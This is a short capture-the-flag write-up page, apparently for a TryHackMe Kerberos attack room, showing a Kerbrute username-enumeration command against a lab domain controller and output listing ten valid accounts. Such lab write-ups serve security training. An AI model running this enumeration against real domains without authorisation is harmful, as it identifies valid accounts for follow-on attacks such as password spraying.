Skip to content

THM - attackingkerberos

2 Enumeration w/ Kerbrute

./kerbrute userenum --dc controller.local -d controller.local User.txt
        __             __               __     
       / /_____  _____/ /_  _______  __/ /____ 
      / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
    /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

    Version: v1.0.3 (9dad6e1) - 06/02/22 - Ronnie Flathers @ropnop

    2022/06/02 10:42:41 >  Using KDC(s):
    2022/06/02 10:42:41 >   controller.local:88

    2022/06/02 10:42:41 >  [+] VALID USERNAME:       admin1@controller.local
    2022/06/02 10:42:41 >  [+] VALID USERNAME:       admin2@controller.local
    2022/06/02 10:42:41 >  [+] VALID USERNAME:       administrator@controller.local
    2022/06/02 10:42:41 >  [+] VALID USERNAME:       httpservice@controller.local
    2022/06/02 10:42:41 >  [+] VALID USERNAME:       machine1@controller.local
    2022/06/02 10:42:41 >  [+] VALID USERNAME:       machine2@controller.local
    2022/06/02 10:42:41 >  [+] VALID USERNAME:       sqlservice@controller.local
    2022/06/02 10:42:41 >  [+] VALID USERNAME:       user1@controller.local
    2022/06/02 10:42:41 >  [+] VALID USERNAME:       user2@controller.local
    2022/06/02 10:42:41 >  [+] VALID USERNAME:       user3@controller.local